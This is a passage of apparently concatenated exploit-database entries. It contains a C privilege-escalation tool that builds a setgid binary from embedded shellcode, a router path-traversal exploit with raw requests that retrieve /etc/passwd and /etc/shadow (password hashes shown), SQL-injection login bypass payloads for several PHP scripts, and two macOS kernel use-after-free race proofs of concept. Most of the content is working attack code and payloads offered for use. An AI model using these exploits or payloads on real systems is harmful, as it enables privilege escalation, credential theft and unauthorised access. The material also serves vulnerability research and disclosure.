http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
with minimal changes, so I wont provide a PoC here.
The bug was possibly introduced via:
commit ee735086f8670be1591fa9593e80dd60163a7a2f
Author: ...
Date: Wed Nov 11 22:54:56 2015 +0100
util-lib: use MODE_INVALID as invalid value for mode_t everywhere
So we believe that this mostly affects v228 of systemd, but its recommended
that distributors cross-check their systemd versions for vulnerable
touch_*() functions. We requested
a CVE for this issue from MITRE by ourselfs: CVE-2016-10156
We would like to see that systemd upstream retrieves CVE's themself
for their own bugs, even if its believed that its just a local DoS.
This would make distributors life much easier when we read the git logs
to spot potential issues. The systemd git log is really huge, with
lots of commits each week ("new services as a service").
Sebastian
*/
// Source: http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* This tool allows to create a setgid binary in appropriate directory
* to escalate to the group of this directory.
*
* Compile: gcc -o CreateSetgidBinary CreateSetgidBinary.c
*
* Usage: CreateSetgidBinary [targetfile] [suid-binary] [placeholder] [args]
*
* Example:
*
* # ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg
* # ls -al ./escalate
* # ./escalate /bin/sh
*
* Copyright (c) 2015 halfdog <me (%) halfdog.net>
*
* See http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ for more information.
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/wait.h>
int main(int argc, char **argv) {
// No slashes allowed, everything else is OK.
char suidExecMinimalElf[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0xd0,
0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
};
int destFd=open(argv[1], O_RDWR|O_CREAT, 07777);
if(destFd<0) {
fprintf(stderr, "Failed to open %s, error %s\n", argv[1], strerror(errno));
return(1);
}
char *suidWriteNext=suidExecMinimalElf;
char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
while(suidWriteNext!=suidWriteEnd) {
char *suidWriteTestPos=suidWriteNext;
while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
// We cannot write any 0-bytes. So let seek fill up the file wihh
// null-bytes for us.
lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
suidWriteNext=suidWriteTestPos;
while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
int result=fork();
if(!result) {
struct rlimit limits;
// We can't truncate, that would remove the setgid property of
// the file. So make sure the SUID binary does not write too much.
limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
limits.rlim_max=limits.rlim_cur;
setrlimit(RLIMIT_FSIZE, &limits);
// Do not rely on some SUID binary to print out the unmodified
// program name, some OSes might have hardening against that.
// Let the ld-loader will do that for us.
limits.rlim_cur=1<<22;
limits.rlim_max=limits.rlim_cur;
result=setrlimit(RLIMIT_AS, &limits);
dup2(destFd, 1);
dup2(destFd, 2);
argv[3]=suidWriteNext;
execve(argv[2], argv+3, NULL);
fprintf(stderr, "Exec failed\n");
return(1);
}
waitpid(result, NULL, 0);
suidWriteNext=suidWriteTestPos;
// ftruncate(destFd, suidWriteTestPos-suidExecMinimalElf);
}
fprintf(stderr, "Completed\n");
return(0);
}
# Exploit Title: TM RG4332 Wireless Router Traversal Arbitrary File Read
# Date: 27/01/2017
# Exploit Author: Saeid Atabaki
# Version: RG4332_V2.7.0
# Tested on: RG4332 with mini_http 1.19
= 1 =============================================================
GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
Connection: close
---
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=17746062;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
= 2 =============================================================
GET /cgi-bin/webproc?getpage=html/../../../etc/shadow&var:menu=status&var:page=system_msg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
Connection: close
---
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=17746062;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
# # # # #
# Exploit Title: Web Based TimeSheet Script - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://qualitypointtech.net/
# Software Buy: http://www.qualitypointtech.com/webtimesheet/
# Demo: http://qualitypointtech.net/timesheetdemo/index.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/ and set Username:anything Password:'or''=' and hit enter.
# # # # #
# # # # #
# Exploit Title: KB Messages PHP Script V1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://kunals.com/
# Software Download: http://phpscripts.kunals.com/d/item/files/kbmessages.rar
# Demo: http://phpscripts.kunals.com/d/item/detail/messages/demo/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/ and set Username and Password to 'or''=' and hit enter.
# # # # #
# # # # #
# Exploit Title: KB Login Authentication Script V1.1 - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://kunals.com/
# Software Download: http://phpscripts.kunals.com/d/item/files/kblogin.rar
# Demo: http://phpscripts.kunals.com/d/item/detail/login/demo/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/ and set Username and Password to 'or''=' and hit enter.
# # # # #
# # # # #
# Exploit Title: KB Affiliate Referral PHP Script V1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://kunals.com/
# Software Download: http://phpscripts.kunals.com/d/item/files/kbaffiliate.rar
# Demo: http://phpscripts.kunals.com/d/item/detail/affiliate/demo/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/index.php?page=act/login and set Username and Password to 'or''=' and hit enter.
# # # # #
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1034
The task struct has a lock (itk_lock_data, taken via the itk_lock macros) which is supposed to
protect the task->itk_* ports.
The host_self_trap mach trap accesses task->itk_host without taking this lock leading to a use-after-free
given the following interleaving of execution:
Thread A: host_self_trap:
read current_task()->itk_host // Thread A reads itk_host
Thread B: task_set_special_port:
*whichp = port; // Thread B replaces itk_host with eg MACH_PORT_NULL
itk_unlock(task);
if (IP_VALID(old))
ipc_port_release_send(old); // Thread B drops last ref on itk_host
Thread A: host_self_trap:
passes the port to ipc_port_copy_send // uses the free'd port
host_self_trap should use one of the canonical accessors for the task's host port, not just directly read it.
PoC tested on MacOS 10.12.1
*/
// ianbeer
#if 0
iOS/MacOS kernel UaF due to lack of locking in host_self_trap
The task struct has a lock (itk_lock_data, taken via the itk_lock macros) which is supposed to
protect the task->itk_* ports.
The host_self_trap mach trap accesses task->itk_host without taking this lock leading to a use-after-free
given the following interleaving of execution:
Thread A: host_self_trap:
read current_task()->itk_host // Thread A reads itk_host
Thread B: task_set_special_port:
*whichp = port; // Thread B replaces itk_host with eg MACH_PORT_NULL
itk_unlock(task);
if (IP_VALID(old))
ipc_port_release_send(old); // Thread B drops last ref on itk_host
Thread A: host_self_trap:
passes the port to ipc_port_copy_send // uses the free'd port
host_self_trap should use one of the canonical accessors for the task's host port, not just directly read it.
PoC tested on MacOS 10.12.1
#endif
// example boot-args
// debug=0x144 -v pmuflags=1 kdp_match_name=en3 -zp -zc gzalloc_min=120 gzalloc_max=200
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/host_priv.h>
mach_port_t q() {
mach_port_t p = MACH_PORT_NULL;
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p);
mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
return p;
}
int start = 0;
mach_port_t rq = MACH_PORT_NULL;
void* racer(void* arg) {
for(;;) {
while(!start){;}
usleep(10);
mach_port_t p = mach_host_self();
mach_port_deallocate(mach_task_self(), p);
start = 0;
}
}
int main() {
pthread_t thread;
pthread_create(&thread, NULL, racer, NULL);
for (;;){
mach_port_t p = q();
kern_return_t err = task_set_special_port(mach_task_self(), TASK_HOST_PORT, p);
mach_port_deallocate(mach_task_self(), p);
mach_port_destroy(mach_task_self(), p);
// kernel holds the only ref
start = 1;
task_set_special_port(mach_host_self(), TASK_HOST_PORT, MACH_PORT_NULL);
}
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=973
IOService::matchPassive is called when trying to match a request dictionary against a candidate IOService.
We can call this function on a controlled IOService with a controlled matching table OSDictionary via the
io_service_match_property_table_* kernel MIG APIs wrapped by IOServiceMatchPropertyTable.
If a candidate IOService does match against the dictionary but the dictionary also specifies an
"IOParentMatch" key then we reach the following code (in IOService.cpp:)
OSNumber* alternateRegistryID = OSDynamicCast(OSNumber, where->getProperty(kIOServiceLegacyMatchingRegistryIDKey));
if(alternateRegistryID != NULL) {
if(aliasServiceRegIds == NULL)
{
aliasServiceRegIds = OSArray::withCapacity(sizeof(alternateRegistryID));
}
aliasServiceRegIds->setObject(alternateRegistryID);
}
("where" is the controlled IOService.)
getProperty is an IORegistryEntry API which directly calls the getObject method
of the OSDictionary holding the entry's properties. getProperty, unlike copyProperty, doesn't take a reference on
the value of the property which means that there is a short window between
where->getProperty(kIOServiceLegacyMatchingRegistryIDKey)
and
aliasServiceRegIds->setObject(alternateRegistryID)
when if another thread sets a new value for the IOService's "IOServiceLegacyMatchingRegistryID" registry property
the alternateRegistryID OSNumber can be freed. This race condition can be won quite easily and can lead to a virtual call
being performed on a free'd object.
On MacOS IOBluetoothHCIController is one of a number of IOServices which allow an unprivileged user to set the
IOServiceLegacyMatchingRegistryID property.
One approach to fixing this bug would be to call copyProperty instead and drop the ref on the property after adding it
to the aliasServiceRegIds array.
Tested on MacOS Sierra 10.12.1 (16B2555)
*/
// ianbeer
// clang -o iorace iorace.c -framework IOKit -framework CoreFoundation && sync
#if 0
MacOS/iOS kernel use after free due to failure to take reference in IOService::matchPassive
IOService::matchPassive is called when trying to match a request dictionary against a candidate IOService.
We can call this function on a controlled IOService with a controlled matching table OSDictionary via the
io_service_match_property_table_* kernel MIG APIs wrapped by IOServiceMatchPropertyTable.
If a candidate IOService does match against the dictionary but the dictionary also specifies an
"IOParentMatch" key then we reach the following code (in IOService.cpp:)
OSNumber* alternateRegistryID = OSDynamicCast(OSNumber, where->getProperty(kIOServiceLegacyMatchingRegistryIDKey));
if(alternateRegistryID != NULL) {
if(aliasServiceRegIds == NULL)
{
aliasServiceRegIds = OSArray::withCapacity(sizeof(alternateRegistryID));
}
aliasServiceRegIds->setObject(alternateRegistryID);
}
("where" is the controlled IOService.)
getProperty is an IORegistryEntry API which directly calls the getObject method
of the OSDictionary holding the entry's properties. getProperty, unlike copyProperty, doesn't take a reference on
the value of the property which means that there is a short window between
where->getProperty(kIOServiceLegacyMatchingRegistryIDKey)
and
aliasServiceRegIds->setObject(alternateRegistryID)
when if another thread sets a new value for the IOService's "IOServiceLegacyMatchingRegistryID" registry property
the alternateRegistryID OSNumber can be freed. This race condition can be won quite easily and can lead to a virtual call
being performed on a free'd object.
On MacOS IOBluetoothHCIController is one of a number of IOServices which allow an unprivileged user to set the
IOServiceLegacyMatchingRegistryID property.
One approach to fixing this bug would be to call copyProperty instead and drop the ref on the property after adding it
to the aliasServiceRegIds array.
Tested on MacOS Sierra 10.12.1 (16B2555)
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>
io_service_t service = MACH_PORT_NULL;
void* setter(void* arg) {
char number = 1;
CFNumberRef num = CFNumberCreate(kCFAllocatorDefault, kCFNumberCharType, &number);
while(1) {
kern_return_t err;
err = IORegistryEntrySetCFProperty(
service,
CFSTR("IOServiceLegacyMatchingRegistryID"),
num);
if (err != KERN_SUCCESS){
printf("setProperty failed\n");
return NULL;
}
}
return NULL;
}
int main(){
kern_return_t err;
service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
pthread_t thread;
pthread_create(&thread, NULL, setter, NULL);
CFMutableDictionaryRef dict2;
dict2 = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks,
&kCFTypeDictionaryValueCallBacks);
CFDictionarySetValue(dict2, CFSTR("key"), CFSTR("value"));
CFMutableDictionaryRef dict;
dict = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks,
&kCFTypeDictionaryValueCallBacks);
CFDictionarySetValue(dict, CFSTR("IOProviderClass"), CFSTR("IOService"));
CFDictionarySetValue(dict, CFSTR("IOResourceMatch"), CFSTR("IOBSD"));
CFDictionarySetValue(dict, CFSTR("IOParentMatch"), dict2);
while(1) {
boolean_t match = 0;
err = IOServiceMatchPropertyTable(service, dict, &match);
if (err != KERN_SUCCESS){
printf("no matches\n");
}
}
pthread_join(thread, NULL);
return 0;
}